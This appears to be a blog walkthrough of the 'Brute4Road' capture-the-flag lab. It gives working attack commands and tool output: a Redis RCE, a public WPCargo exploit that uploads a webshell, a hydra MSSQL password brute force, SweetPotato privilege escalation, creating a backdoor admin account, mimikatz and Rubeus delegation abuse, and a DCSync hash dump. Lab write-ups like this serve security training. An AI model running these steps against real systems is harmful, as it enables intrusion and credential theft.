lvzhouhang

春秋云镜-Brute4Road

  • ~13.26K 字
  1. 1. FLAG1&FLAG2
  2. 2. FLAG3
  3. 3. FLAG4

FLAG1&FLAG2

先用fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.231.184
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-15 02:37:33] [INFO] 暴力破解线程数: 1
[2025-04-15 02:37:33] [INFO] 开始信息扫描
[2025-04-15 02:37:33] [INFO] 最终有效主机数量: 1
[2025-04-15 02:37:33] [INFO] 开始主机扫描
[2025-04-15 02:37:33] [INFO] 有效端口数量: 233
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:6379
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:80
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:21
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:22
[2025-04-15 02:37:33] [SUCCESS] 服务识别 39.99.231.184:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-04-15 02:37:34] [SUCCESS] 服务识别 39.99.231.184:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-04-15 02:37:38] [SUCCESS] 服务识别 39.99.231.184:6379 => [redis] 版本:5.0.12 产品:Redis key-value store
[2025-04-15 02:37:39] [SUCCESS] 服务识别 39.99.231.184:80 => [http] 版本:1.20.1 产品:nginx
[2025-04-15 02:37:43] [INFO] 存活端口数量: 4
[2025-04-15 02:37:43] [INFO] 开始漏洞扫描
[2025-04-15 02:37:43] [INFO] 加载的插件: ftp, redis, ssh, webpoc, webtitle
[2025-04-15 02:37:43] [SUCCESS] 网站标题 http://39.99.231.184      状态码:200 长度:4833   标题:Welcome to CentOS
[2025-04-15 02:37:44] [SUCCESS] 匿名登录成功!
[2025-04-15 02:37:46] [SUCCESS] Redis 39.99.231.184:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[2025-04-15 02:37:50] [SUCCESS] Redis无密码连接成功: 39.99.231.184:6379
[2025-04-15 02:37:53] [SUCCESS] 扫描已完成: 5/5

打redis主从复制rce,flag在/home/redis/flag下,但是没有权限读,base64具有suid权限,可以用base64读取

1
/usr/bin/base64 ./flag01|/usr/bin/base64 -d

ftp服务只有一个pub文件夹,没什么用,上传fscan扫描一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
./fscan -h 172.22.2.7/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-15 15:22:58] [INFO] 暴力破解线程数: 1
[2025-04-15 15:22:58] [INFO] 开始信息扫描
[2025-04-15 15:22:58] [INFO] CIDR范围: 172.22.2.0-172.22.2.255
[2025-04-15 15:22:58] [INFO] 生成IP范围: 172.22.2.0.%!d(string=172.22.2.255) - %!s(MISSING).%!d(MISSING)
[2025-04-15 15:22:58] [INFO] 解析CIDR 172.22.2.7/24 -> IP范围 172.22.2.0-172.22.2.255
[2025-04-15 15:22:58] [INFO] 最终有效主机数量: 256
[2025-04-15 15:22:58] [INFO] 开始主机扫描
[2025-04-15 15:22:58] [INFO] 正在尝试无监听ICMP探测...
[2025-04-15 15:22:58] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-15 15:22:58] [INFO] 切换为PING方式探测...
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.3      存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.7      存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.16     存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.18     存活 (ICMP)
[2025-04-15 15:22:59] [SUCCESS] 目标 172.22.2.34     存活 (ICMP)
[2025-04-15 15:23:04] [INFO] 存活主机数量: 5
[2025-04-15 15:23:04] [INFO] 有效端口数量: 233
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:88
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:22
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:22
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:21
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:389
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:1433
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:6379
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.18:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.7:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-04-15 15:23:09] [SUCCESS] 服务识别 172.22.2.3:88 => 
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:80 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.7:80 => [http] 版本:1.20.1 产品:nginx
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:139 =>  Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:139 =>  Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.18:80 => [http]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.34:445 => 
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:445 => 
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:445 => 
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.34:139 =>  Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.]
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.18:139 => 
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.18:445 => 
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.7:6379 => 
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.34:135 => 
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.16:135 => 
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.3:135 => 
[2025-04-15 15:24:10] [INFO] 存活端口数量: 21
[2025-04-15 15:24:10] [INFO] 开始漏洞扫描
[2025-04-15 15:24:10] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mssql, netbios, redis, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.34
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.3
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
   IPv4地址:
      └─ 172.22.2.16
[2025-04-15 15:24:10] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.16        状态码:404 长度:315    标题:Not Found
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.7         状态码:200 长度:4833   标题:Welcome to CentOS
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.3      DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[2025-04-15 15:24:10] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[2025-04-15 15:24:10] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-04-15 15:24:10] [SUCCESS] 匿名登录成功!
[2025-04-15 15:24:10] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-04-15 15:24:10] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.18        状态码:200 长度:57738  标题:又一个WordPress站点
[2025-04-15 15:24:12] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2025-04-15 15:24:18] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456

扫到一堆哦一个一个看,172.22.2.18的80端口是一个wps,用wpscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
[i] Plugin(s) Identified:

[+] wpcargo
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
 | Last Updated: 2024-08-08T17:00:00.000Z
 | [!] The version is out of date, the latest version is 7.0.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 6 vulnerabilities identified:
 |
 | [!] toc: true
title: WPCargo < 6.9.0 - Unauthenticated RCE
 |     Fixed in: 6.9.0
 |     References:
 |      - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
 |
 | [!] toc: true
title: WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting
 |     Fixed in: 6.9.5
 |     References:
 |      - https://wpscan.com/vulnerability/d5c6f894-6ad1-46f4-bd77-17ad9234cfc3
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1436
 |
 | [!] toc: true
title: WPCargo Track & Trace < 6.9.5 - Admin+ Stored Cross Site Scripting
 |     Fixed in: 6.9.5
 |     References:
 |      - https://wpscan.com/vulnerability/ef5aa8a7-23a7-4ce0-bb09-d9c986386114
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1435
 |
 | [!] toc: true
title: WPCargo Track & Trace <= 7.0.6 - Unauthenticated SQL Injection
 |     References:
 |      - https://wpscan.com/vulnerability/f5fdb762-cbc1-4352-9ab2-cbba9d3d33e2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44004
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e725ec0-4897-4ba7-a803-80e8aafacbd1
 |
 | [!] toc: true
title: WPCargo Track & Trace <= 7.0.6 - Missing authorization to Authenticated (Subscriber+) Settings Update
 |     References:
 |      - https://wpscan.com/vulnerability/b433fff9-b501-4fb3-9f04-5e18b64b0a90
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54271
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c467a78-1ba4-4c0d-84e6-db54fc1b0c63
 |
 | [!] toc: true
title: WPCargo Track & Trace <= 7.0.6 - Authenticated (Contributor+) Insecure Direct Object Reference
 |     References:
 |      - https://wpscan.com/vulnerability/594ae221-06b6-4bc2-b5b6-0f9bac880f7b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31609
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/887ecedb-0bc8-4488-b6fa-27cfa22345e6
 |
 | Version: 6.x.x (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

存在wpcargo插件,有一个rce的漏洞https://github.com/biulove0x/CVE-2021-25003

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# python3 2 -t "http://172.22.2.18/"
[proxychains] DLL init: proxychains-ng 4.17

############################################
# @author : biulove0x                      #
# @name   : WP Plugins WPCargo Exploiter   #
# @cve    : CVE-2021-25003                 #
############################################

[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.22.2.18:80  ...  OK
[-] http://172.22.2.18/wp-content/wp-conf.php => Uploaded!

蚁剑连接,可以拿到数据库的密码

flag2在数据库里

FLAG3

在另一张表里有很多密码

是172.22.2.16 msssql数据库的密码本,然后动手爆破,mssql的默认用户名是sa,因为导出来的有空格,所以把前面的空格处理掉

1
└─# grep -P "\w+" pass -o >2
1
2
└─# hydra -l sa -P pass 172.22.2.16 mssql -f -I -vV
[1433][mssql] host: 172.22.2.16   login: sa   password: ElGNkOiC

然后用MDUT连接

上传sweetpotato.exe然后提权

flag03在C:\Users\Administrator\flag\下

1
C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"

FLAG4

netstat -ano发现开启了3389

1
2
3
4
5
6
7
8
9
10
11
12
TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       692

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4

  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2680

  TCP    0.0.0.0:2383           0.0.0.0:0              LISTENING       2932

  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       812

添加一个用户

1
2
C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user lv Asd123123 /add"
C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators lv /add"

然后远程桌面登录

可以发现有域环境,先上传mimikatz提取hash,上传bloodhound可以发现有约束性委派

获取到域用户的哈希为cea3e66a2715c71423e7d3f0ff6cd352

通过Rubeus申请机器账户MSSQLSERVER的TGT,执行后,将得到 Base64 加密后的 TGT 票据

1
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

然后使用 S4U2Self 扩展代表域管理员 Administrator 请求针对域控 LDAP 服务的票据,并将得到的票据传递到内存中

1
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:[base64(ticket.kirbi)]

LDAP服务具有DCSync权限,可以导出域内用户哈希

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

得到域管的哈希为1a19251fbd935969832616366ae3fe62

然后就可以用WMI服务登录域控,flag在C:\Users\Administrator\flag下

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!